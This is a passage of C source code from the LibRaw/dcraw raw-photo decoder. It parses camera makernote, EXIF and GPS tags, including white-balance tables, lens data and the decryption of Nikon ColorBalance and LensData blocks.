bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
free(table_buf);
}
}
fseek(ifp,_pos,SEEK_SET);
#endif
if (tag == 2 && strstr(make,"NIKON") && !iso_speed)
iso_speed = (get2(),get2());
if (tag == 37 && strstr(make,"NIKON") && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc,1,1,ifp);
iso_speed = int(100.0 * libraw_powf64(2.0f,float(cc)/12.0-5.0));
}
if (tag == 4 && len > 26 && len < 35) {
if ((i=(get4(),get2())) != 0x7fff && (!iso_speed || iso_speed == 65535))
iso_speed = 50 * libraw_powf64(2.0, i/32.0 - 4);
#ifdef LIBRAW_LIBRARY_BUILD
get4();
#else
if ((i=(get2(),get2())) != 0x7fff && !aperture)
aperture = libraw_powf64(2.0, i/64.0);
#endif
if ((i=get2()) != 0xffff && !shutter)
shutter = libraw_powf64(2.0, (short) i/-32.0);
wbi = (get2(),get2());
shot_order = (get2(),get2());
}
if ((tag == 4 || tag == 0x114) && !strncmp(make,"KONICA",6)) {
fseek (ifp, tag == 4 ? 140:160, SEEK_CUR);
switch (get2()) {
case 72: flip = 0; break;
case 76: flip = 6; break;
case 82: flip = 5; break;
}
}
if (tag == 7 && type == 2 && len > 20)
fgets (model2, 64, ifp);
if (tag == 8 && type == 4)
shot_order = get4();
if (tag == 9 && !strncmp(make,"Canon",5))
fread (artist, 64, 1, ifp);
if (tag == 0xc && len == 4)
FORC3 cam_mul[(c << 1 | c >> 1) & 3] = getreal(type);
if (tag == 0xd && type == 7 && get2() == 0xaaaa) {
for (c=i=2; (ushort) c != 0xbbbb && i < len; i++)
c = c << 8 | fgetc(ifp);
while ((i+=4) < len-5)
if (get4() == 257 && (i=len) && (c = (get4(),fgetc(ifp))) < 3)
flip = "065"[c]-'0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x10 && type == 4) unique_id = get4();
#endif
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos2 = ftell(ifp);
if (!strncasecmp(make,"Olympus",7))
{
short nWB, tWB;
if ((tag == 0x20300108) || (tag == 0x20310109))
imgdata.makernotes.olympus.ColorSpace = get2();
if ((tag == 0x20400102) && (len == 2) &&
(!strncasecmp(model, "E-410", 5) || !strncasecmp(model, "E-510", 5)))
{
int i;
for (i=0; i<64; i++)
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] =
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
for (i=64; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
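// Tags 0x20400102..0x2040010d hold per-preset WB multipliers; each slot is
// mapped to its nominal colour temperature and, where one exists, to the
// corresponding LIBRAW_WBI_* illuminant (0x100 marks an unnamed preset).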
if ((tag >= 0x20400102) && (tag <= 0x2040010d))
{
ushort CT;
nWB = tag-0x20400102;
switch (nWB)
{
case 0 : CT = 3000; tWB = LIBRAW_WBI_Tungsten; break;
case 1 : CT = 3300; tWB = 0x100; break;
case 2 : CT = 3600; tWB = 0x100; break;
case 3 : CT = 3900; tWB = 0x100; break;
case 4 : CT = 4000; tWB = LIBRAW_WBI_FL_W; break;
case 5 : CT = 4300; tWB = 0x100; break;
case 6 : CT = 4500; tWB = LIBRAW_WBI_FL_D; break;
case 7 : CT = 4800; tWB = 0x100; break;
case 8 : CT = 5300; tWB = LIBRAW_WBI_FineWeather; break;
case 9 : CT = 6000; tWB = LIBRAW_WBI_Cloudy; break;
case 10: CT = 6600; tWB = LIBRAW_WBI_FL_N; break;
case 11: CT = 7500; tWB = LIBRAW_WBI_Shade; break;
default: CT = 0; tWB = 0x100;
}
if (CT)
{
imgdata.color.WBCT_Coeffs[nWB][0] = CT;
imgdata.color.WBCT_Coeffs[nWB][1] = get2();
imgdata.color.WBCT_Coeffs[nWB][3] = get2();
if (len == 4)
{
imgdata.color.WBCT_Coeffs[nWB][2] = get2();
imgdata.color.WBCT_Coeffs[nWB][4] = get2();
}
}
if (tWB != 0x100)
FORC4 imgdata.color.WB_Coeffs[tWB][c] = imgdata.color.WBCT_Coeffs[nWB][c+1];
}
if ((tag >= 0x20400113) && (tag <= 0x2040011e))
{
nWB = tag-0x20400113;
imgdata.color.WBCT_Coeffs[nWB][2] = imgdata.color.WBCT_Coeffs[nWB][4] = get2();
switch (nWB)
{
case 0: tWB = LIBRAW_WBI_Tungsten; break;
case 4: tWB = LIBRAW_WBI_FL_W; break;
case 6: tWB = LIBRAW_WBI_FL_D; break;
case 8: tWB = LIBRAW_WBI_FineWeather; break;
case 9: tWB = LIBRAW_WBI_Cloudy; break;
case 10: tWB = LIBRAW_WBI_FL_N; break;
case 11: tWB = LIBRAW_WBI_Shade; break;
default: tWB = 0x100;
}
if (tWB != 0x100)
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] =
imgdata.color.WBCT_Coeffs[nWB][2];
}
if (tag == 0x20400121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
if (len == 4)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
}
if (tag == 0x2040011f)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = get2();
}
if (tag == 0x30000120)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
if (len == 2)
{
for (int i=0; i<256; i++)
imgdata.color.WB_Coeffs[i][1] = imgdata.color.WB_Coeffs[i][3] = 0x100;
}
}
if (tag == 0x30000121)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
}
if (tag == 0x30000122)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = get2();
}
if (tag == 0x30000123)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
}
if (tag == 0x30000124)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Sunset][2] = get2();
}
if (tag == 0x30000130)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
}
if (tag == 0x30000131)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
}
if (tag == 0x30000132)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
}
if (tag == 0x30000133)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
}
if((tag == 0x20400805) && (len == 2))
{
imgdata.makernotes.olympus.OlympusSensorCalibration[0]=getreal(type);
imgdata.makernotes.olympus.OlympusSensorCalibration[1]=getreal(type);
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.olympus.OlympusSensorCalibration[0];
}
if (tag == 0x20200401)
{
imgdata.other.FlashEC = getreal(type);
}
}
fseek(ifp,_pos2,SEEK_SET);
#endif
if (tag == 0x11 && is_raw && !strncmp(make,"NIKON",5)) {
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
}
if (tag == 0x14 && type == 7) {
if (len == 2560) {
fseek (ifp, 1248, SEEK_CUR);
goto get2_256;
}
fread (buf, 1, 10, ifp);
if (!strncmp(buf,"NRW ",4)) {
fseek (ifp, strcmp(buf+4,"0100") ? 46:1546, SEEK_CUR);
cam_mul[0] = get4() << 2;
cam_mul[1] = get4() + get4();
cam_mul[2] = get4() << 2;
}
}
if (tag == 0x15 && type == 2 && is_raw)
fread (model, 64, 1, ifp);
if (strstr(make,"PENTAX")) {
if (tag == 0x1b) tag = 0x1018;
if (tag == 0x1c) tag = 0x1017;
}
if (tag == 0x1d) {
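// Camera serial number: decimal digits are accumulated into 'serial'; under
// LibRaw, a non-digit character switches to a fixed custom_serial seed
// (34 for the D50, 96 otherwise) that is used for LensData decryption below.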
while ((c = fgetc(ifp)) && c != EOF)
#ifdef LIBRAW_LIBRARY_BUILD
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
#endif
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
#ifdef LIBRAW_LIBRARY_BUILD
}
if (!imgdata.shootinginfo.BodySerial[0])
sprintf(imgdata.shootinginfo.BodySerial, "%d", serial);
#endif
}
if (tag == 0x29 && type == 1) { // Canon PowerShot G9
c = wbi < 18 ? "012347800000005896"[wbi]-'0' : 0;
fseek (ifp, 8 + c*32, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get4();
}
#ifndef LIBRAW_LIBRARY_BUILD
if (tag == 0x3d && type == 3 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2() >> (14-tiff_bps);
#endif
if (tag == 0x81 && type == 4) {
data_offset = get4();
fseek (ifp, data_offset + 41, SEEK_SET);
raw_height = get2() * 2;
raw_width = get2();
filters = 0x61616161;
}
if ((tag == 0x81 && type == 7) ||
(tag == 0x100 && type == 7) ||
(tag == 0x280 && type == 1)) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (tag == 0x88 && type == 4 && (thumb_offset = get4()))
thumb_offset += base;
if (tag == 0x89 && type == 4)
thumb_length = get4();
if (tag == 0x8c || tag == 0x96)
meta_offset = ftell(ifp);
if (tag == 0x97) {
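// Nikon ColorBalance block: the four-digit version selects the layout of the
// as-shot multipliers; for versions 0200 and later the data is encrypted, so
// 324 bytes are buffered in buf97 and decoded at tag 0xa7 below.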
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
switch (ver97) {
case 100:
fseek (ifp, 68, SEEK_CUR);
FORC4 cam_mul[(c >> 1) | ((c & 1) << 1)] = get2();
break;
case 102:
fseek (ifp, 6, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
break;
case 103:
fseek (ifp, 16, SEEK_CUR);
FORC4 cam_mul[c] = get2();
}
if (ver97 >= 200) {
if (ver97 != 205) fseek (ifp, 280, SEEK_CUR);
fread (buf97, 324, 1, ifp);
}
}
if (tag == 0xa1 && type == 7) {
order = 0x4949;
fseek (ifp, 140, SEEK_CUR);
FORC3 cam_mul[c] = get4();
}
if (tag == 0xa4 && type == 3) {
fseek (ifp, wbi*48, SEEK_CUR);
FORC3 cam_mul[c] = get2();
}
if (tag == 0xa7) { // shutter count
NikonKey = fgetc(ifp)^fgetc(ifp)^fgetc(ifp)^fgetc(ifp);
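// The XOR of these four bytes, combined with the camera serial number, seeds
// the xlat[]-based keystream used to decrypt buf97 (white balance) and, under
// LibRaw, the encrypted LensData block buffered at tag 0x98.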
if ( (unsigned) (ver97-200) < 17) {
ci = xlat[0][serial & 0xff];
cj = xlat[1][NikonKey];
ck = 0x60;
for (i=0; i < 324; i++)
buf97[i] ^= (cj += ci * ck++);
i = "66666>666;6A;:;55"[ver97-200] - '0';
FORC4 cam_mul[c ^ (c >> 1) ^ (i & 1)] =
sget2 (buf97 + (i & -2) + c*2);
}
#ifdef LIBRAW_LIBRARY_BUILD
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
#endif
}
if(tag == 0xb001 && type == 3) // Sony ModelID
{
unique_id = get2();
}
if (tag == 0x200 && len == 3)
shot_order = (get4(),get4());
if (tag == 0x200 && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
if (tag == 0x201 && len == 4)
FORC4 cam_mul[c ^ (c >> 1)] = get2();
if (tag == 0x220 && type == 7)
meta_offset = ftell(ifp);
if (tag == 0x401 && type == 4 && len == 4)
FORC4 cblack[c ^ c >> 1] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
// not corrected for the file's bit depth; patched later in open_datastream
if (tag == 0x03d && strstr(make,"NIKON") && len == 4)
{
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black += i;
}
#endif
if (tag == 0xe01) { /* Nikon Capture Note */
#ifdef LIBRAW_LIBRARY_BUILD
int loopc = 0;
#endif
order = 0x4949;
fseek (ifp, 22, SEEK_CUR);
for (offset=22; offset+22 < len; offset += 22+i) {
#ifdef LIBRAW_LIBRARY_BUILD
if(loopc++>1024)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
tag = get4();
fseek (ifp, 14, SEEK_CUR);
i = get4()-4;
if (tag == 0x76a43207) flip = get2();
else fseek (ifp, i, SEEK_CUR);
}
}
if (tag == 0xe80 && len == 256 && type == 7) {
fseek (ifp, 48, SEEK_CUR);
cam_mul[0] = get2() * 508 * 1.078 / 0x10000;
cam_mul[2] = get2() * 382 * 1.173 / 0x10000;
}
if (tag == 0xf00 && type == 7) {
if (len == 614)
fseek (ifp, 176, SEEK_CUR);
else if (len == 734 || len == 1502)
fseek (ifp, 148, SEEK_CUR);
else goto next;
goto get2_256;
}
if ((tag == 0x1011 && len == 9) || tag == 0x20400200)
for (i=0; i < 3; i++)
{
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.makernotes.olympus.ColorSpace)
{
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
}
else
{
FORC3 imgdata.color.ccm[i][c] = ((short) get2()) / 256.0;
}
#else
FORC3 cmatrix[i][c] = ((short) get2()) / 256.0;
#endif
}
if ((tag == 0x1012 || tag == 0x20400600) && len == 4)
FORC4 cblack[c ^ c >> 1] = get2();
if (tag == 0x1017 || tag == 0x20400100)
cam_mul[0] = get2() / 256.0;
if (tag == 0x1018 || tag == 0x20400100)
cam_mul[2] = get2() / 256.0;
if (tag == 0x2011 && len == 2) {
get2_256:
order = 0x4d4d;
cam_mul[0] = get2() / 256.0;
cam_mul[2] = get2() / 256.0;
}
if ((tag | 0x70) == 0x2070 && (type == 4 || type == 13))
fseek (ifp, get4()+base, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
if (tag == 0x2010)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, 0x2010);
fseek(ifp,_pos3,SEEK_SET);
}
if (
((tag == 0x2020) || (tag == 0x3000) || (tag == 0x2030) || (tag == 0x2031)) &&
((type == 7) || (type == 13)) &&
!strncasecmp(make,"Olympus",7)
)
{
INT64 _pos3 = ftell(ifp);
parse_makernote(base, tag);
fseek(ifp,_pos3,SEEK_SET);
}
// IB end
#endif
if ((tag == 0x2020) && ((type == 7) || (type == 13)) && !strncmp(buf,"OLYMP",5))
parse_thumb_note (base, 257, 258);
if (tag == 0x2040)
parse_makernote (base, 0x2040);
if (tag == 0xb028) {
fseek (ifp, get4()+base, SEEK_SET);
parse_thumb_note (base, 136, 137);
}
if (tag == 0x4001 && len > 500 && len < 100000) {
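// Canon ColorData: the offset of the as-shot WB block depends on the
// ColorData generation, which is identified here by the record length.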
i = len == 582 ? 50 : len == 653 ? 68 : len == 5120 ? 142 : 126;
fseek (ifp, i, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
for (i+=18; i <= len; i+=10) {
get2();
FORC4 sraw_mul[c ^ (c >> 1)] = get2();
if (sraw_mul[1] == 1170) break;
}
}
if(!strncasecmp(make,"Samsung",7))
{
if (tag == 0xa020) // get the full Samsung encryption key
for (i=0; i<11; i++) SamsungKey[i] = get4();
if (tag == 0xa021) // get and decode Samsung cam_mul array
FORC4 cam_mul[c ^ (c >> 1)] = get4() - SamsungKey[c];
#ifdef LIBRAW_LIBRARY_BUILD
if (tag == 0xa023)
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] = get4() - SamsungKey[8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = get4() - SamsungKey[9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = get4() - SamsungKey[10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][2] = get4() - SamsungKey[0];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Ill_A][3] >> 4;
}
}
if (tag == 0xa024)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][c ^ (c >> 1)] = get4() - SamsungKey[c+1];
if (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][0] < (imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1]>>1))
{
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][1] >> 4;
imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_D65][3] >> 4;
}
}
if (tag == 0xa025)
imgdata.color.linear_max[0]=
imgdata.color.linear_max[1]=
imgdata.color.linear_max[2]=
imgdata.color.linear_max[3]= get4() - SamsungKey[0];
if (tag == 0xa030 && len == 9)
for (i=0; i < 3; i++)
FORC3 imgdata.color.ccm[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
#endif
if (tag == 0xa031 && len == 9) // get and decode Samsung color matrix
for (i=0; i < 3; i++)
FORC3 cmatrix[i][c] = (float)((short)((get4() + SamsungKey[i*3+c])))/256.0;
if (tag == 0xa028)
FORC4 cblack[c ^ (c >> 1)] = get4() - SamsungKey[c];
}
else
{
// Do other makers also use tags 0xa021 and 0xa028?
if (tag == 0xa021)
FORC4 cam_mul[c ^ (c >> 1)] = get4();
if (tag == 0xa028)
FORC4 cam_mul[c ^ (c >> 1)] -= get4();
}
if (tag == 0x4021 && get4() && get4())
FORC4 cam_mul[c] = 1024;
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
/*
Since the TIFF DateTime string has no timezone information,
assume that the camera's clock was set to Universal Time.
*/
void CLASS get_timestamp (int reversed)
{
struct tm t;
char str[20];
int i;
str[19] = 0;
if (reversed)
for (i=19; i--; ) str[i] = fgetc(ifp);
else
fread (str, 19, 1, ifp);
memset (&t, 0, sizeof t);
if (sscanf (str, "%d:%d:%d %d:%d:%d", &t.tm_year, &t.tm_mon,
&t.tm_mday, &t.tm_hour, &t.tm_min, &t.tm_sec) != 6)
return;
t.tm_year -= 1900;
t.tm_mon -= 1;
t.tm_isdst = -1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
void CLASS parse_exif (int base)
{
unsigned kodak, entries, tag, type, len, save, c;
double expo,ape;
kodak = !strncmp(make,"EASTMAN",7) && tiff_nifds < 3;
entries = get2();
if(!strncmp(make,"Hasselblad",10) && (tiff_nifds > 3) && (entries > 512)) return;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && savepos + len > fsize*2) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.dng.MinFocal = getreal(type);
imgdata.lens.dng.MaxFocal = getreal(type);
imgdata.lens.dng.MaxAp4MinFocal = getreal(type);
imgdata.lens.dng.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
#endif
case 33434: tiff_ifd[tiff_nifds-1].t_shutter =
shutter = getreal(type); break;
case 33437: aperture = getreal(type); break; // 0x829d FNumber
case 34855: iso_speed = get2(); break;
case 34866:
if (iso_speed == 0xffff && (!strncasecmp(make, "SONY",4) || !strncasecmp(make, "CANON",5)))
iso_speed = getreal(type);
break;
case 36867:
case 36868: get_timestamp(0); break;
case 37377: if ((expo = -getreal(type)) < 128 && shutter == 0.)
tiff_ifd[tiff_nifds-1].t_shutter =
shutter = libraw_powf64(2.0, expo);
break;
case 37378: // 0x9202 ApertureValue
if ((fabs(ape = getreal(type))<256.0) && (!aperture))
aperture = libraw_powf64(2.0, ape/2);
break;
case 37385: flash_used = getreal(type); break;
case 37386: focal_len = getreal(type); break;
case 37500: // tag 0x927c
#ifdef LIBRAW_LIBRARY_BUILD
if (((make[0] == '\0') && (!strncmp(model, "ov5647",6))) ||
((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_OV5647",9))) ||
((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_imx219",9)))) {
char mn_text[512];
char *pos;
char ccms[512];
ushort l;
float num;
fgets(mn_text, MIN(len,511), ifp);
mn_text[511] = 0;
pos = strstr(mn_text, "gain_r=");
if (pos)
cam_mul[0] = atof(pos + 7);
pos = strstr(mn_text, "gain_b=");
if (pos)
cam_mul[2] = atof(pos + 7);
if ((cam_mul[0] > 0.001f) && (cam_mul[2] > 0.001f))
cam_mul[1] = cam_mul[3] = 1.0f;
else
cam_mul[0] = cam_mul[2] = 0.0f;
pos = strstr(mn_text, "ccm=");
if(pos)
{
pos +=4;
char *pos2 = strstr(pos, " ");
if(pos2)
{
l = pos2 - pos;
memcpy(ccms, pos, l);
ccms[l] = '\0';
#if defined WIN32 || defined(__MINGW32__)
// Win32 strtok is already thread-safe
pos = strtok(ccms, ",");
#else
char *last=0;
pos = strtok_r(ccms, ",",&last);
#endif
if(pos)
{
for (l = 0; l < 4; l++)
{
num = 0.0;
for (c = 0; c < 3; c++)
{
imgdata.color.ccm[l][c] = (float)atoi(pos);
num += imgdata.color.ccm[l][c];
#if defined WIN32 || defined(__MINGW32__)
pos = strtok(NULL, ",");
#else
pos = strtok_r(NULL, ",",&last);
#endif
if(!pos) goto end; // broken
}
if (num > 0.01)
FORC3 imgdata.color.ccm[l][c] = imgdata.color.ccm[l][c] / num;
}
}
}
}
end:;
}
else
#endif
parse_makernote (base, 0);
break;
case 40962: if (kodak) raw_width = get4(); break;
case 40963: if (kodak) raw_height = get4(); break;
case 41730:
if (get4() == 0x20002)
for (exif_cfa=c=0; c < 8; c+=2)
exif_cfa |= fgetc(ifp) * 0x01010101 << c;
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS parse_gps_libraw(int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
if (entries > 200)
return;
if (entries > 0)
imgdata.other.parsed_gps.gpsparsed = 1;
while (entries--) {
tiff_get(base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
switch (tag) {
case 1: imgdata.other.parsed_gps.latref = getc(ifp); break;
case 3: imgdata.other.parsed_gps.longref = getc(ifp); break;
case 5: imgdata.other.parsed_gps.altref = getc(ifp); break;
case 2:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.latitude[c] = getreal(type);
break;
case 4:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.longtitude[c] = getreal(type);
break;
case 7:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.gpstimestamp[c] = getreal(type);
break;
case 6:
imgdata.other.parsed_gps.altitude = getreal(type);
break;
case 9: imgdata.other.parsed_gps.gpsstatus = getc(ifp); break;
}
fseek(ifp, save, SEEK_SET);
}
}
#endif
void CLASS parse_gps (int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
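/* gpsdata[] packing used by dcraw: tags 2/4/7 (latitude, longitude and time,
   three rationals each) fill gpsdata[0..17]; altitude (tag 6) goes to
   gpsdata[18..19]; the N/S, E/W and altitude-reference bytes (tags 1/3/5)
   land in gpsdata[29..31]; the datum and date strings (tags 18/29) are
   copied starting at gpsdata[20] and gpsdata[23]. */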
switch (tag) {
case 1: case 3: case 5:
gpsdata[29+tag/2] = getc(ifp); break;
case 2: case 4: case 7:
FORC(6) gpsdata[tag/3*6+c] = get4(); break;
case 6:
FORC(2) gpsdata[18+c] = get4(); break;
case 18: case 29:
fgets ((char *) (gpsdata+14+tag/3), MIN(len,12), ifp);
}
fseek (ifp, save, SEEK_SET);
}
}
void CLASS romm_coeff (float romm_cam[3][3])
{
static const float rgb_romm[3][3] = /* ROMM == Kodak ProPhoto */
{ { 2.034193, -0.727420, -0.306766 },
{ -0.228811, 1.231729, -0.002922 },
{ -0.008565, -0.153273, 1.161839 } };
int i, j, k;
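// cmatrix = rgb_romm * romm_cam: compose the file-supplied camera-to-ROMM
// matrix with the fixed ProPhoto(ROMM)-to-RGB matrix above, so cmatrix maps
// camera space directly to output RGB.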
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
for (cmatrix[i][j] = k=0; k < 3; k++)
cmatrix[i][j] += rgb_romm[i][k] * romm_cam[k][j];
}
void CLASS parse_mos (int offset)
{
char data[40];
int skip, from, i, c, neut[4], planes=0, frot=0;
static const char *mod[] =
{ "","DCB2","Volare","Cantare","CMost","Valeo 6","Valeo 11","Valeo 22",
"Valeo 11p","Valeo 17","","Aptus 17","Aptus 22","Aptus 75","Aptus 65",
"Aptus 54S","Aptus 65S","Aptus 75S","AFi 5","AFi 6","AFi 7",
"AFi-II 7","Aptus-II 7","","Aptus-II 6","","","Aptus-II 10","Aptus-II 5",
"","","","","Aptus-II 10R","Aptus-II 8","","Aptus-II 12","","AFi-II 12" };
float romm_cam[3][3];
fseek (ifp, offset, SEEK_SET);
while (1) {
if (get4() != 0x504b5453) break;
get4();
fread (data, 1, 40, ifp);
skip = get4();
from = ftell(ifp);
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp(data,"CameraObj_camera_type")) {
stmread(imgdata.lens.makernotes.body, skip, ifp);
}
if (!strcmp(data,"back_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.BodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.BodySerial));
strcpy (imgdata.shootinginfo.BodySerial, words[0]);
}
if (!strcmp(data,"CaptProf_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
strcpy (imgdata.shootinginfo.InternalBodySerial, words[0]);
}
#endif
// IB end
if (!strcmp(data,"JPEG_preview_data")) {
thumb_offset = from;
thumb_length = skip;
}
if (!strcmp(data,"icc_camera_profile")) {
profile_offset = from;
profile_length = skip;
}
if (!strcmp(data,"ShootObj_back_type")) {
fscanf (ifp, "%d", &i);
if ((unsigned) i < sizeof mod / sizeof (*mod))
strcpy (model, mod[i]);
}
if (!strcmp(data,"icc_camera_to_tone_matrix")) {
for (i=0; i < 9; i++)
((float *)romm_cam)[i] = int_to_float(get4());
romm_coeff (romm_cam);
}
